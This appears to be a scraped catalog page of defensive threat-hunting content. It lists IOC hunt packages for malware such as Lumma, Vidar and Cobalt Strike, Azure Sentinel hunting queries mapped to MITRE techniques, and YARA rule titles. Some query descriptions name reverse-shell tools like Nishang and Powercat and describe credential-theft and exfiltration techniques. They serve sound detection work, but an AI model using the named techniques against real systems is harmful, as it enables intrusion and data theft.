The Havoc malware family is designed for data exfiltration and persistence, often leveraging encrypted communication channels to steal sensitive

iocthreatfoxwin-havoc
ThreatFox source
DnsEvents

Hunt package for 20 IOCs associated with Lumma Stealer

infostealeriocthreatfoxwin-lumma
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 7 IOCs associated with Quasar RAT

backdooriocthreatfoxwin-quasar_rat
ThreatFox source
DnsEvents

StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames,

infostealeriocthreatfoxwin-strelastealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Vidar is a data exfiltration malware

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

The "32-bit" malware

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 38 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
T1030

'This hunting query looks for users whose total returned data that is significantly above their average.'

huntingmicrosoftofficial
Azure-Sentinel source
T1020

'This hunting query looks for users who have multiple failed queries in a short space of time.'

huntingmicrosoftofficial
Yara-Rules source

Look for WhirlPool constants

community
Azure-Sentinel source
T1001.002
CommonSecurityLog

'Threat actors can use JPEG files to hide malware, or other malicious code from inspection. This query looks for the downloading of abnormally large JPEG files from a source where large JPEG files hav

exploithuntingmicrosoftofficial
Yara-Rules source

Looks for advapi API functions

community
Azure-Sentinel source
T1059
AzureActivity

'This query look for users starting an Azure CloudShell session and summarizes the Azure Activity from that user account during that timeframe (by default 1 hour). This can be used to help identify ab

huntingmicrosoftofficial
Azure-Sentinel source
T1537

'This hunting query will identify where a file is uploaded to Azure File or Blob storage and is then accessed once before being deleted. This activity may be indicative of exfiltration activity.'

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1020T1537

'This hunting query will try to identify instances where a file us uploaded to file storage and then deleted within a given threshold. By default the query will find instances where a file is uploaded

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1570

'Looks for file uploads actions to Azure File and Blob Storage from known VPS provider network ranges. This is not an exhaustive list of VPS provider ranges but covers some of the most prevalent provi

huntingmicrosoftofficial
Azure-Sentinel source
T1485

'Detect mass file deletion events within Azure File and Blob storage. deleteWindow controls the period of time the deletions must occur in, whilst the deleteThreshold controls how many files must be d

huntingmicrosoftofficial
Yara-Rules source

Looks for big numbers 20:sized

community
Yara-Rules source

Detects 32-bit numeric values that may indicate obfuscation

community
Yara-Rules source

Looks for big numbers 48:sized

community
Yara-Rules source

Looks for big numbers 64:sized

community
Yara-Rules source

Looks for big numbers 128:sized

community
Yara-Rules source

Looks for big numbers 256:sized

community
Yara-Rules source

Look for Blowfish constants

community
Azure-Sentinel source
AzureDiagnostics

'Discover all critical ports from a list having rules like 'Any' for sourceIp, which means that they are opened to everyone. Critial ports should not be opened to everyone, and should be filtered.'

huntingmicrosoftofficial
Azure-Sentinel source
T1136
AuditLogs

'This query looks at the last 14 days for "Consent to application" operation by a user/app which could potentially mean unauthorized access. Additional context is added from AuditLogs based on Corrlea

backdoorhuntingmicrosoftofficial
Yara-Rules source

Look for CRC16 table

community
Yara-Rules source

Look for CRC32 [poly]

community
Yara-Rules source

Look for CRC32 table

community
Yara-Rules source

CRC32 table lookup

community
Yara-Rules source

Look for CRC32b [poly]

community
Yara-Rules source

Look for CRC32c (Castagnoli) [poly]

community
Yara-Rules source

Looks for crypt32 CryptBinaryToStringA function

community
Azure-Sentinel source
T1595T1530

"This Kusto (KQL) hunting query detects blob-enumeration or file-spraying behaviour in Azure Storage by: - Aggregating requests into time-bound sessions with row_window_session(). - Defining a "us

backdoorhuntingmicrosoftofficial
Look for ElfHash
yara low
Yara-Rules source

Look for ElfHash

community
Yara-Rules source

Look for FlyUtils.CnDES Decrypt ECB function

community
Yara-Rules source

Look for FlyUtils.CnDES Encrypt ECB function

community
Azure-Sentinel source
T1136

'This hunting query identifies a user that add/invite a member to the organization for the first time. This technique can be leveraged by attackers to add stealth account access to the organization.'

huntingmicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'This query will look for events where guest user was invited but has not accepted/redeemed invite for unusually longer period. Any invites not redeemed for longer period of time can be misused and

huntingmicrosoftofficial
Azure-Sentinel source
T1547.006
DeviceProcessEvents

'Detects observed Visual Studio Code (VS Code) extension installation activity on a user's system within the query time range. Note: This query does not return a complete per-user inventory of instal

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1484
CloudAppEvents

"This query searches for any action type with high frequency that involves adding, modifying, or removing something in cloud app policies. It sees where the properties are modified such that the old v

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1190
AzureDiagnostics

'This hunting query looks in Azure Web Application Firewall data to find possible SpringShell Exploitation Attempt (CVE-2022-22965). The Spring Framework is one of the most widely used lightweight op

backdoorexploithuntingmicrosoftofficial
Yara-Rules source

List of primes [char]

community
Yara-Rules source

List of primes [long]

community
Azure-Sentinel source
T1136
AuditLogs

'Compares the current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by Azure Apps and automated approv

huntingmicrosoftofficial
Azure-Sentinel source
T1136
AuditLogs

'Compares current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by specific users.'

huntingmicrosoftofficial
Azure-Sentinel source
T1570
DeviceFileEvents

'Finds instances where a file uploaded to blob or file storage and it is seen on an endpoint by Microsoft Defender XDR.'

huntingmicrosoftofficial
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 112 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 2 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with OtterCookie

iocjs-otter_cookiethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 44 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

SmartLoader is a multi-stage loader malware that establishes persistence and exfiltrates data by dropping additional payloads and maintaining command-and-control communication

iocthreatfoxwin-smartloader
ThreatFox source
DnsEvents

StrelaStealer is a credential-stealing malware that exfiltrates

infostealeriocthreatfoxwin-strelastealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Vidar is a data exfiltration malware that steals credentials and sensitive information, often using encrypted channels to transmit stolen data to command-and-control servers.

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 37 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 24 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 24 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 14 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
T1528
SigninLogs

'This hunting query will try to identify the user account used to perform a file upload to blob storage. This query can be used to match all file upload events, or filtering can be applied on filename

huntingmicrosoftofficial
Azure-Sentinel source
T1098T1078T1496
AuditLogs

'Identifies when a new user is granted access and any subsequent audit related activity. This can help you identify rogue or malicious user behavior.'

huntingmicrosoftofficial
Azure-Sentinel source
T1078
SigninLogs

'Detects when a user has successfully authenticated to another Microsoft Entra ID tenant with an identity in your organization's tenant. Ref: https://docs.microsoft.com/azure/active-directory/fundam

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1098T1548
AuditLogs

'Identifies accounts that have been added to a PIM managed privileged group'

huntingmicrosoftofficial
Azure-Sentinel source
T1556.006
AuditLogs

'Identifies modifications to user's MFA settings. An attacker could use access to modify MFA settings to bypass MFA requirements or maintain persistence.

evasionhuntingmicrosoftofficialpersistence
Azure-Sentinel source
T1556
AuditLogs

This query shows details about all approved Entra ID Governance Access Packages assignments. The results include the time the request was created and approved along with the justification text provide

huntingmicrosoftofficial
Azure-Sentinel source
T1555
AuditLogsSecurityAlert

'Looks for users retrieving BitLocker keys. Enriches these logs with a summary of alerts associated with the user accessing the keys. Use this query to start looking for anomalous patterns of key retr

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1070
imRegistry

'This detection looks the prevention of crash dumps being created. This can be used to limit reporting by malware, look for suspicious processes setting this registry key.'

huntingmicrosoftofficial
Yara-Rules source

Steal IE 7 credential

communitycredential-theft
Azure-Sentinel source
imProcessCreate

'breakdown of scripts running in the environment'

huntingmicrosoftofficial
Azure-Sentinel source
imProcessCreate

'Entropy calculation used to help identify Hosts where they have a high variety of processes(a high entropy process list on a given Host over time). This helps us identify rare processes on a given Ho

huntingmicrosoftofficial
Azure-Sentinel source
imProcessCreate

'Finds attempts to list users or groups using the built-in Windows 'net' tool '

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1114
imProcessCreate

'This hunting query looks for hosts exporting a mailbox from an on-prem Exchange server, followed by that same host removing the export within a short time window. This pattern has been observed by at

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1011
imProcessCreate

'Invoke-PowerShellTcpOneLine is a PowerShell script to create a simple and small reverse shell. It can be abused by attackers to exfiltrate data. This query looks for command line activity similar to

backdoorhuntingmicrosoftofficialpowershell
ldpreload
yara low
Yara-Rules source

YARA rule: ldpreload

community
Yara-Rules source

APC queue tasks migration

backdoorcommunity
Yara-Rules source

This rule checks MySQL database presence

community
Azure-Sentinel source
T1011
imProcessCreate

'Looks for Base64-encoded commands associated with the Nishang reverse TCP shell. Ref: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1'

backdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
T1098
AuditLogs

'This hunting query identifies updates to the RequiredResourceAccess property of an OAuth application. This property specifies resources that an application requires access to and the set of OAuth per

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1011
imProcessCreate

'Powercat is a PowerShell implementation of netcat. Whilst it can be used as a legitimate administrative tool it can be abused by attackers to exfiltrate data. This query looks for command line activi

backdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
imProcessCreate

'Finds PowerShell execution events that could involve a download'

huntingmicrosoftofficialpowershell
Yara-Rules source

The 'rat_rdp

backdoorcommunity
Yara-Rules source

The 'rat_telnet' YARA rule detects the presence of a Remote Administration

backdoorcommunity
Yara-Rules source

Remote Administration toolkit VNC

backdoorcommunity
Yara-Rules source

Remote Administration toolkit using webcam

backdoorcommunity
Azure-Sentinel source
T1218.011
imProcessCreate

'This detection uses Normalized Process Events to hunt Signed Binary Proxy Execution: Rundll32 activities'

huntingmicrosoftofficial
Yara-Rules source

Sniff Lan network traffic

community
Azure-Sentinel source
T1072
imProcessCreate

'Beyond your internal software management systems, it is possible you may not have visibility into your entire footprint of SolarWinds installations. This is intended to help use process exection inf

huntingmicrosoftofficial
Yara-Rules source

Malware can spread east-west file

community
Yara-Rules source

Malware can spread east-west using share drive

community
Yara-Rules source

Match Windows Http API call

community
Yara-Rules source

Match Windows Inet API call

community
Yara-Rules source

Match Windows Inet API library declaration

backdoorcommunity
Yara-Rules source

Match Winsock 2 API library declaration

backdoorcommunity
Azure-Sentinel source
T1110
imProcessCreate

'Summarizes uses of uncommon & undocumented commandline switches to create persistence User accounts may be created to achieve persistence on a machine. Read more here: https://attack.mitre.org/wiki/T

huntingmicrosoftofficialpersistence
Azure-Sentinel source
T1059T1087T1482T1201T1069T1074
imProcessCreate

Attackers can use Adfind which is administrative tool to gather information about Domain controllers, ADFS Servers. They may also rename executables with other benign tools on the system. Below query

backdoorhuntingmicrosoftofficialransomware
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 113 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 4 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 43 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Cobalt Strike is a sophisticated malware used for command and control (C2) operations, enabling attackers

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
UrlClickEvents

The Lumma Stealer malware is a data-exfiltration tool that steals sensitive information such as credentials, browser data, and cryptocurrency wallet details. It typically arrives via phishing emails containing malicious URLs or compromised websites that deliver the payload. SOC analysts should monitor for unusual outbound traffic, unexpected process executions, and signs of credential theft or

infostealeriocthreatfoxwin-lumma
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 2 IOCs associated with MaskGramStealer

infostealeriocthreatfoxwin-maskgramstealer
ThreatFox source
DnsEvents

StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames, passwords, and browser cookies by establishing command-and-control (C2) communication through malicious domains. It

infostealeriocthreatfoxwin-strelastealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Vidar malware is a data exfiltration tool that steals credentials and sensitive information via encrypted channels, often leveraging stolen credentials or phishing to maintain persistence. It typically arrives through malicious email attachments, compromised credentials, or exploit kits, using IP:port and URL IOCs to establish command-and

iocthreatfoxwin-vidar
Azure-Sentinel source
imProcessCreate

'Shows the rarest processes seen running for the first time. (Performs best over longer time ranges - eg 3+ days rather than 24 hours!) These new processes could be benign new programs installed on ho

backdoorhuntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as 118-107-44-190-8080

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as 118-107-44-213-8080

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as 118-107-44-253-8080

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 15 malicious URLs tagged as 144-91-86-92

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as 38-76-199-154-8888

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as ascii

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 29 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 11 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 13 malicious URLs tagged as Mozi

iocurlhaus
Yara-Rules source

Affect private profile

community
Yara-Rules source

Create or check mutex

community
Yara-Rules source

Affect private profile

community
Yara-Rules source

Affect system registries

community
Yara-Rules source

Affect system token

community
Azure-Sentinel source
T1529
imProcessCreate

'This detection uses Normalized Process Events to detect System Shutdown/Reboot (MITRE Technique: T1529)'

huntingmicrosoftofficial
Azure-Sentinel source
T1059

This query identifies Copilot Studio AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because the

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1078T1562
IdentityInfo

This query identifies AI agents whose owners are either disabled or removed from the organization. Orphaned agents without an active owner pose governance and security risks because no one is account

backdoorhuntingmicrosoftofficialpersistence
Azure-Sentinel source

This query identifies AI agents that remain unpublished and have not been modified for at least 30 days. While these agents may not pose an immediate security threat, they can create operational inef

backdoorhuntingmicrosoftofficial
Yara-Rules source

Perform crypto currency mining

community
Yara-Rules source

Inject certificate in store

community
Azure-Sentinel source
T1105
imProcessCreate

'This detection uses Normalized Process Events to hunt Certutil activities'

huntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

This query identifies Copilot Studio AI agents that are published and contain actions configured with Author Authentication (maker`s personal credentials) but have not been used or invoked in the last

credential-theftexploithuntingmicrosoftofficial
Azure-Sentinel source
T1552T1078

This query identifies Copilot Studio AI agents that contain hard-coded credentials in Topics or Actions. Storing credentials in clear text within agent logic creates a security risk because these sec

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1562

This query identifies Copilot Studio AI agents that use HTTP actions to endpoints where Power Platform connectors are available (e.g., graph.microsoft.com, management.azure.com). Using direct HTTP ca

backdoorevasionhuntingmicrosoftofficial
Azure-Sentinel source
T1071T1040

This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the ri

aptcredential-theftexploithuntingmicrosoftofficial
Azure-Sentinel source
T1071T1041

This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unau

backdoorevasionexploithuntingmicrosoftofficial
Azure-Sentinel source
T1078T1552

Identifies Copilot Studio AI agents with Model Context Protocol (MCP) tools configured using maker credentials. This configuration can create security risks because the tool runs with the maker`s pers

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1078T1190

This query identifies Copilot Studio AI agents without authentication mechanisms. Authentication is an agent-level configuration. Such misconfiguration poses significant security risks because when t

backdoorhuntingmicrosoftofficial
Azure-Sentinel source

This query identifies Copilot Studio AI agents that are shared broadly-either with the entire organization or configured for multi-tenant access. Such configurations significantly increase the risk of

backdoorhuntingmicrosoftofficial
Azure-Sentinel source

This query identifies Copilot Studio AI agents that are published and use the maker`s personal credentials in their authentication or integration flows. This configuration introduces security risks b

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

This query identifies Copilot Studio AI agents that are published but have not been used by any user in the organization for the last 30 days. Dormant agents can create unnecessary exposure and may s

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1499T1562

Advers

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1041
IdentityInfo

This query identifies Copilot Studio AI agents configured to send emails to external mailboxes (outside the organization`s domains). Such configurations can lead to sensitive or internal data being e

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source

This query identifies Copilot Studio AI agents with classic orchestration that include Actions not referenced in any Topic. While unused Actions may not pose an immediate security risk, they can intr

backdoorcredential-thefthuntingmicrosoftofficial
Yara-Rules source

Steal Firefox credential

communitycredential-theft
Steal credential
yara low
Yara-Rules source

Steal credential

communitycredential-theft
Yara-Rules source

Steal VNC credential

communitycredential-theft
Azure-Sentinel source
T1071
SecurityAlert

' This hunting query looks for process command line activity related to activity observed by Dev-0056.The command lines this query hunts for are used as part of the threat actor's post exploitation ac

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1204T1102T1567

'This hunting query looks for hosts that have attempted to interact with the Discord CDN. This activity is not normally invoked from the command line and could indicate C2, exfiltration, or malware de

backdoorhuntingmicrosoftofficial
Dynamic DNS
yara low
Yara-Rules source

Dynamic DNS

community
Yara-Rules source

Escalade priviledges

community
Azure-Sentinel source
T1119
imProcessCreate

'The Exchange Powershell Snapin was loaded on a host, this allows for a Exchange server management via PowerShell. Whilst this is a legitimate administrative tool it is abused by attackers to performs

backdoorhuntingmicrosoftofficialpowershell
Run a keylogger
yara low
Yara-Rules source

Run a keylogger

communityinfostealer
Yara-Rules source

Lookup Geolocation

community
Yara-Rules source

Lookup external IP

community
Yara-Rules source

Communication using dga

community
Yara-Rules source

Communications use DNS

community
Yara-Rules source

File downloader/dropper

community
Yara-Rules source

Communications over FTP

community
Yara-Rules source

Communications over HTTP

community
Yara-Rules source

Communications over IRC network

community
Yara-Rules source

Communications over SSL

community
Yara-Rules source

Communications over RAW socket

community
Take screenshot
yara low
Yara-Rules source

Take screenshot

community
Record Audio
yara low
Yara-Rules source

Record Audio

community
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 6 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 107 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 6 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEvents

Hunt package for 4 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
DnsEvents

Hunt package for 66 IOCs associated with StrelaStealer

infostealeriocthreatfoxwin-strelastealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 6 IOCs associated with Vidar

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 21 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 30 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 18 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 10 malicious URLs tagged as exe

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The Mozi malware family is a backdoor that enables remote command execution and data exfiltration, often used for persistent access and espionage. It typically arrives via phishing emails containing malicious URLs or through compromised websites hosting malicious domains. SOC analysts should monitor for unusual outbound traffic to listed domains, signs of lateral movement,

iocurlhaus
Azure-Sentinel source
T1552T1078
IdentityInfo

This query identifies A365 AI agents that contain hard-coded credentials in their tools or actions. Storing credentials in clear text within agent logic creates a security risk because these secrets

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1071T1040
IdentityInfo

This query identifies A365 AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the risk of inte

aptcredential-theftexploithuntingmicrosoftofficial
Azure-Sentinel source
T1071T1041
IdentityInfo

This query identifies A365 AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unauthorized n

backdoorevasionexploithuntingmicrosoftofficial
Azure-Sentinel source
T1059
IdentityInfo

This query identifies A365 AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because they can exec

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1499T1562
IdentityInfo

This query identifies A365 AI agents that have tools configured but they are not mentioned in instructions. This query identifies A365 AI agents that have tools configured but are not mentioned in in

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1078T1562
IdentityInfo

This query identifies A365 AI agents whose owners are either disabled or removed from the organization, and are not blocked. Orphaned agents without an active owner pose governance and security risks

backdoorhuntingmicrosoftofficialpersistence
Azure-Sentinel source
IdentityInfo

This query identifies A365 AI agents that are shared publicly. Such configurations significantly increase the risk of unauthorized access by unintended users, which could lead to data exposure or misu

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1499T1562
IdentityInfo

This query identifies A365 AI agents that are published but have short or insufficient instructions. Short instructions increase the risk of prompt injection attacks, where malicious input can influe

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1499T1562
IdentityInfo

This query identifies A365 AI agents that are published but lack configured instructions. Missing instructions increase the risk of prompt injection attacks, where malicious input can influence the a

backdoorhuntingmicrosoftofficial
Yara-Rules source

Check if hotfix are applied

community
Azure-Sentinel source
T1041T1565

This query identifies Copilot Studio AI agents using generative orchestration to send emails via the Outlook connector where all action input values are populated dynamically by the orchestrator. Th

backdoorhuntingmicrosoftofficial
Yara-Rules source

Create a COM server

community
Yara-Rules source

Create a new process

community
Yara-Rules source

Create a windows service

community
Bypass DEP
yara low
Yara-Rules source

Bypass DEP

communityevasion
Yara-Rules source

Disable Task Manager

community
Azure-Sentinel source
T1190

'This query looks for messages related to file downloads of suspicious file types on an Exchange Server. This could indicate attempted deployment of webshells. This query uses the Exchange HttpProxy

backdoormicrosoftofficialwebshell
Azure-Sentinel source
T1190
W3CIISLog

'This query looks for suspicious request patterns to Exchange servers that fit patterns recently blogged about by PeterJson. This exploitation chain utilises an SSRF vulnerability in Exchange which ev

exploitmicrosoftofficialpowershell
Azure-Sentinel source
T1098T1556

'This alerts when the account setting is changed to allow either external domain access or anonymous access to meetings.'

microsoftofficial
Azure-Sentinel source
T1190
W3CIISLog

'Identifies when 30 or more ports are used for a given client IP in 10 minutes occurring on the IIS server. This could be indicative of attempted port scanning or exploit attempt at internet facing we

exploitmicrosoftofficial
Azure-Sentinel source
T1110
W3CIISLog

'Identifies when 100 or more failed attempts by a given user in 10 minutes occur on the IIS Server. This could be indicative of attempted brute force based on known account information. This could als

microsoftofficial
Yara-Rules source

Hijack network configuration

backdoorcommunity
Yara-Rules source

Code injection with CreateRemoteThread in a remote process

community
Yara-Rules source

Communications dyndns network

community
Yara-Rules source

Communications over P2P network

community
Yara-Rules source

Communications smtp

community
Yara-Rules source

Communications smtp

community
Yara-Rules source

Communications smtp

community
Yara-Rules source

Listen for incoming communication

community
Yara-Rules source

Communications over TOR network

community
Yara-Rules source

Communications over Toredo network

community
Yara-Rules source

Communications over UDP network

community
Yara-Rules source

Install itself for autorun at Windows startup

communitypersistence
Azure-Sentinel source
T1190
W3CIISLog

'This query looks for suspicious request patterns to Exchange servers that fit a pattern observed by Silk Typhoon actors. The same query can be run on HTTPProxy logs from on-premise hosted Exchange se

microsoftofficial
Azure-Sentinel source
T1190

'This query looks for messages related to file downloads of suspicious file types. This query uses the Exchange HttpProxy AOBGeneratorLog, you will need to onboard this log as a custom log under the t

backdoormicrosoftofficial
Azure-Sentinel source
T1598

'Alerts in links that have been shared across multiple Zoom chat channels by the same user in a short space if time. Adjust the threshold figure to change the number of channels a message needs to be

microsoftofficial
ThreatFox source
DnsEvents

Hunt package for 124 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 12 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 25 IOCs associated with Unknown Loader

iocthreatfoxunknown_loader
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 9 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 10 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting financial institutions and using persistence mechanisms to maintain long-term access.

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 44 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 40 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
T1078

'The alert shows users that join a Zoom meeting from a time zone other than the one the meeting was created in. You can also whitelist known good time zones in the tz_whitelist value using the tz data

microsoftofficial
Yara-Rules source

Following Rule is referenced from AlienVault's Yara rule repository.This rule contains additional processes and driver names.

community
Yara-Rules source

Affect hook table

community
Azure-Sentinel source
T1040

'This alerts when end to end encryption is disabled for Zoom meetings.'

microsoftofficial
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies accounts that are added to a privileged group and then quickly removed, which could be a sign of compromise.'

microsoftofficial
Azure-Sentinel source
T1098
SecurityEventWindowsEvent

'Identifies whenever a user account has the setting "Password Never Expires" in the user account properties selected. This is indicated in Security event 4738 in the EventData item labeled UserAccount

microsoftofficial
Azure-Sentinel source
T1078.004
SigninLogs

